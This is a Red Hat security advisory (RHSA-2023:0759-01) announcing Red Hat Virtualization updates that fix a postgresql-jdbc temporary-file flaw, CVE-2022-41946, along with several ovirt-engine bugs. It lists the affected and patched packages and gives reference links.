-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEBP+4DupqR5Sgt1DB4RjMIDkeNxkFAmPq5PIACgkQ4RjMIDke  
NxkM2hAApRo7JQlaNxVVpw1y96PG2oAVygFVw+N1cpEO72L4gDjvAb7+tOBqUTkz  
Az+IizQfC2gapw9g/csghk+s+/gt16Q0iX4jDDEDypZ5So/LoaucFVTbGCy9Hns0  
T0PTS4a0KIFBHbRQ3ktrhkUp49ykqDWwWdnvM1QgtUe3HfAZQWHVnYpdsj26CTaz  
5ihA0chuzAGnx2lUZbyz8nl6f9kdqx1x8uSF0P7AkIp6L7IcZOLLO8tXnKApeC7S  
HSbafe7JKxVNPtzaI/ZuxQe9/9Kr8VUiezVCK+WvJ9akRsy4CQ022yirIOlFIEhF  
32mFq+BaQ77YTULP2us7BG8oMJ3tPxfmlykhqD4P0p4JRW6ZFoQmVKyUEPdsaALG  
NYilSR3CRSpaCbh+dunGMJshNSHRJO6NluLq1mPVB7xFSiypgJADjS95zBSINtC9  
JrKusbpICiAm8VqVC4GNltG+djft0NjbSiJXPo409X7j01Bt1ZJpk2UWTUfZbHMU  
hW90JFySoHLRcVt3Af1mbBkyaHv0GSKG+Fjul/XyBlG3U8eJVXJhWCrhMjm17GK0  
6j4HEUsAYzAg0j+Ss7QQKhwxlW3BPd+3D2kGwbPzBx/rcyVjbc456fyCLSYP58cf  
EIYmmOwF9QcH939TCxoIglHOsdAuuIilGApd2on9QWOj8QSaUFw=  
=2kFu  
-----END PGP SIGNATURE-----

Apple Security Advisory 2023-02-13-2

Red Hat Security Advisory 2023-0759-01 - PostgreSQL is an advanced object-relational database management system. The postgresql-jdbc package includes the .jar files needed for Java programs to access a PostgreSQL database.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: Red Hat Virtualization security and bug fix update  
Advisory ID:       RHSA-2023:0759-01  
Product:           Red Hat Virtualization  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:0759  
Issue date:        2023-02-14  
CVE Names:         CVE-2022-41946   
=====================================================================

1. Summary:

An update for ovirt-ansible-collection, ovirt-engine, and postgresql-jdbc  
is now available for Red Hat Virtualization 4 Tools for Red Hat Enterprise  
Linux 8, Red Hat Virtualization 4 for Red Hat Enterprise Linux 8, and Red  
Hat Virtualization Engine 4.4.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

RHEL-8-RHEV-S-4.4 - Red Hat Virtualization Engine 4.4 - noarch  
Red Hat Virtualization 4 Management Agent for RHEL 7 Hosts - noarch  
Red Hat Virtualization 4 Tools for Red Hat Enterprise Linux 8 - noarch

3. Description:

PostgreSQL is an advanced object-relational database management system. The  
postgresql-jdbc package includes the .jar files needed for Java programs to  
access a PostgreSQL database.

Security Fix(es):

* postgresql-jdbc: PreparedStatement.setText(int, InputStream) will create  
a temporary file if the InputStream is larger than 2k (CVE-2022-41946)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* With this release, the upgrade function of the ovirt_host module waits  
long enough for the upgraded host to reach the desired state after upgrade.  
(BZ#2161703)

* Previously,the ovirt-enghine ansible-runner artifacts were only cleaned  
once, and the machine could run out of free disk space on the /var  
partition. In this release, the artifacts are cleaned periodically  
according to values defined in the  
AnsibleRunnerArtifactsCleanupCheckTimeInHours and  
AnsibleRunnerArtifactsLifetimeInDays engine-config options. (BZ#2151549)

* Code change for BZ2089299 introduced a regression, which didn't allow to  
set options in the engine-config which restricted the allowable values  
using the validValues field (for example ClientModeVncDefault or  
UserSessionTimeOutInterval).  
In this release, setting values for those fields works the same way as in  
RHV versions earlier than RHV 4.4 SP1 batch 3 (ovirt-engine-4.5.3).  
(BZ#2159768)

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/2974891

If the postgresql service is running, it will be automatically restarted  
after installing this update.

5. Bugs fixed (https://bugzilla.redhat.com/):

2151549 - Artifacts of ansible-runner (executed from ovirt-engine) did not clean up as expected  
2153399 - CVE-2022-41946 postgresql-jdbc: PreparedStatement.setText(int, InputStream) will create a temporary file if the InputStream is larger than 2k  
2159768 - Regression in ClientModeVncDefault  
2161703 - [RHEVM] Two nodes cluster upgrade failed, tries to put a node into maintenance while the updated is rebooting

6. Package List:

Red Hat Virtualization 4 Tools for Red Hat Enterprise Linux 8:

Source:  
ovirt-ansible-collection-2.4.2-1.el8ev.src.rpm

noarch:  
ovirt-ansible-collection-2.4.2-1.el8ev.noarch.rpm

Red Hat Virtualization 4 Management Agent for RHEL 7 Hosts:

Source:  
ovirt-ansible-collection-2.4.2-1.el8ev.src.rpm

noarch:  
ovirt-ansible-collection-2.4.2-1.el8ev.noarch.rpm

RHEL-8-RHEV-S-4.4 - Red Hat Virtualization Engine 4.4:

Source:  
ovirt-ansible-collection-2.4.2-1.el8ev.src.rpm  
ovirt-engine-4.5.3.7-1.el8ev.src.rpm  
postgresql-jdbc-42.2.14-2.el8ev.src.rpm

noarch:  
ovirt-ansible-collection-2.4.2-1.el8ev.noarch.rpm  
ovirt-engine-4.5.3.7-1.el8ev.noarch.rpm  
ovirt-engine-backend-4.5.3.7-1.el8ev.noarch.rpm  
ovirt-engine-dbscripts-4.5.3.7-1.el8ev.noarch.rpm  
ovirt-engine-health-check-bundler-4.5.3.7-1.el8ev.noarch.rpm  
ovirt-engine-restapi-4.5.3.7-1.el8ev.noarch.rpm  
ovirt-engine-setup-4.5.3.7-1.el8ev.noarch.rpm  
ovirt-engine-setup-base-4.5.3.7-1.el8ev.noarch.rpm  
ovirt-engine-setup-plugin-cinderlib-4.5.3.7-1.el8ev.noarch.rpm  
ovirt-engine-setup-plugin-imageio-4.5.3.7-1.el8ev.noarch.rpm  
ovirt-engine-setup-plugin-ovirt-engine-4.5.3.7-1.el8ev.noarch.rpm  
ovirt-engine-setup-plugin-ovirt-engine-common-4.5.3.7-1.el8ev.noarch.rpm  
ovirt-engine-setup-plugin-vmconsole-proxy-helper-4.5.3.7-1.el8ev.noarch.rpm  
ovirt-engine-setup-plugin-websocket-proxy-4.5.3.7-1.el8ev.noarch.rpm  
ovirt-engine-tools-4.5.3.7-1.el8ev.noarch.rpm  
ovirt-engine-tools-backup-4.5.3.7-1.el8ev.noarch.rpm  
ovirt-engine-vmconsole-proxy-helper-4.5.3.7-1.el8ev.noarch.rpm  
ovirt-engine-webadmin-portal-4.5.3.7-1.el8ev.noarch.rpm  
ovirt-engine-websocket-proxy-4.5.3.7-1.el8ev.noarch.rpm  
postgresql-jdbc-42.2.14-2.el8ev.noarch.rpm  
postgresql-jdbc-javadoc-42.2.14-2.el8ev.noarch.rpm  
python3-ovirt-engine-lib-4.5.3.7-1.el8ev.noarch.rpm  
rhvm-4.5.3.7-1.el8ev.noarch.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-41946  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY+vS49zjgjWX9erEAQhjjhAApzZIpZYF+1xWecL2Ui75tOcKQIzGw6ld  
F3izXJ3z275BSIxG4/cVHurn41iRBv8HtdEUsOJUop3mBCGudAKBWHK+fiL18RDK  
kPR+rpzMLuoh+qrEbDj0tY9BT7kHroPxLffZHwTBtjPUw0gxvkQ95kEOcA04KFbT  
xFNZ2JcvTmGS+sKx++ca1+ZmjcWBvpNGYum+KbaU8OnbOMy/tOArJa+yf43nZeCP  
SSqIpDOD8ssPUBrqt1i3CjHL/uG8PVTyzP3q7NgXpK3GLnBQSR2OPoi0X2yum3Cj  
reyQSyvjqTg7Cz5B84GUCyyIsxrMp3CxnNXR2sKKvtDFFYNyJhOeDe+BkynSiIw7  
JQtPlO6wIl6rkTo5Q7OSA+bBtBkCkGq/8N/CiaDRb23b+02kerbQ/oiMB0CcyNPw  
RFWLgD6BBEjCGXAY4Rb42S+Jnmz6WYiux4DHChIaqxfCOlYNL5pCjIXxI7xyMB6m  
I7e2i5JUdJRobByvcEZ7piWFvqhx4FV17zFRfE8CEg0+HrXO32xg3hyh1kyRxarv  
7s8Ll3eMpb/IxwVaSyA0CrA3f6Us4C5zdRYAFfUDGqgW8fXKtXR5iu/W4MYzvADm  
XiHW0rOsBj3RQuit4bYrF4k3rQjQlD4MT5cKP4CmZ2wB04j5hVdmQVsqbb9Ayr87  
2D/UH7xkQuw=  
=BAYA  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Tag

#mac